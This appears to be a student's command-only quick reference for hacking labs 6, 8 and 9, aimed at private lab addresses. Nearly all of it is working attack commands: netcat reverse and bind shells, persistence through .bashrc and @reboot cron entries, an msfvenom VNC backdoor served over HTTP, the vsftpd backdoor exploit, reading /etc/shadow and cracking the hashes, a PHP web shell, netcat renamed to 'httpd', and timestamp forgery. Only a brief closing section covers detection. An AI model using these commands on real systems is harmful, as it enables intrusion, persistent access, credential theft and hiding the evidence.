# Lab 6 – Client-Side Exploitation & Backdoors (Commands Only)

msfconsole

# Netcat Reverse Shell
nc -lvnp 4444
nc -e /bin/bash 192.168.56.104 4444
whoami
uname -a

# Persistent Backdoor
echo "nc -e /bin/bash 192.168.56.104 4444" >> ~/.bashrc
sudo reboot
nc -lvnp 4444

# VNC Backdoor (Metasploit)
use exploit/multi/handler
set payload windows/vncinject/reverse_tcp
set LHOST 192.168.56.104
set LPORT 5900
exploit

# VNC Payload
msfvenom -p windows/vncinject/reverse_tcp LHOST=192.168.56.104 LPORT=5900 -f exe -o /var/www/html/vnc_backdoor.exe
service apache2 start
http://192.168.56.104/vnc_backdoor.exe


# Lab 8 – System Hacking & Password Cracking (Commands Only)

# Scanning
nmap -sn 192.168.68.0/24
nmap -sS -sV -O 192.168.68.10
ping 192.168.68.10

# Exploitation
msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.68.10
run
sessions -i 1
sessions -u 1

# System Info
uname -a
whoami
cat /etc/shadow

# Hash Extraction
echo 'msfadmin:$1$H6Uks8/P$M0Lkdf2jR1...' > /root/hashes.txt

# John the Ripper
john --list=formats | grep md5
john /root/hashes.txt
john --show /root/hashes.txt

# Hashcat
echo '$6$hr7sD/...$K1DSmET8Q' > hashcat.txt
head -n 10 /usr/share/wordlists/rockyou.txt > rockyou2.txt
hashid hashcat.txt
hashcat -m 500 hashcat.txt rockyou2.txt
hashcat -m 500 hashcat.txt --show

# Post-Exploitation
upload /usr/share/metasploit-framework/data/post/test.txt /tmp/
ls /tmp/
execute -f /bin/bash -a "-c 'echo YOU_HAVE_BEEN_HACKED > /tmp/hacked.txt'"
cat /tmp/hacked.txt


# Lab 9 – Backdooring & Persistent Access (Commands Only)

# Connectivity
ping 192.168.68.10

# Reverse Shell
nc -lvnp 4444
nc 192.168.56.101 4444 -e /bin/bash
id
uname -a

# Bind Shell
nc -lvnp 5555 -e /bin/bash
nc 192.168.56.102 5555

# Persistence (Cron)
sudo crontab -e
@reboot /bin/nc -e /bin/bash 192.168.56.101 6666 &
sudo reboot
nc -lvnp 6666

# Obfuscation
cp /bin/nc /usr/local/bin/httpd
/usr/local/bin/httpd -e /bin/bash 192.168.56.101 8888 &
ps aux | grep httpd
jobs -l

# VNC
vncviewer 192.168.68.10:5900
@reboot /usr/bin/Xtightvnc :0 -geometry 1024x768 -depth 16 -rfbport 5900

# Web Shell
echo '<?php system($_GET["cmd"]); ?>' > /var/www/backdoor.php
chown www-data:www-data /var/www/backdoor.php
curl "http://192.168.68.10/backdoor.php?cmd=whoami"

# Anti-Forensics
touch -r /bin/ls /usr/local/bin/httpd
stat /usr/local/bin/httpd

# Detection & Cleanup
ss -tulnp
netstat -tulnp
pstree -p
crontab -l
find /var/www -name "*.php"
kill -9 PID

```

---

✅ Commands only – Lab 9 quick reference
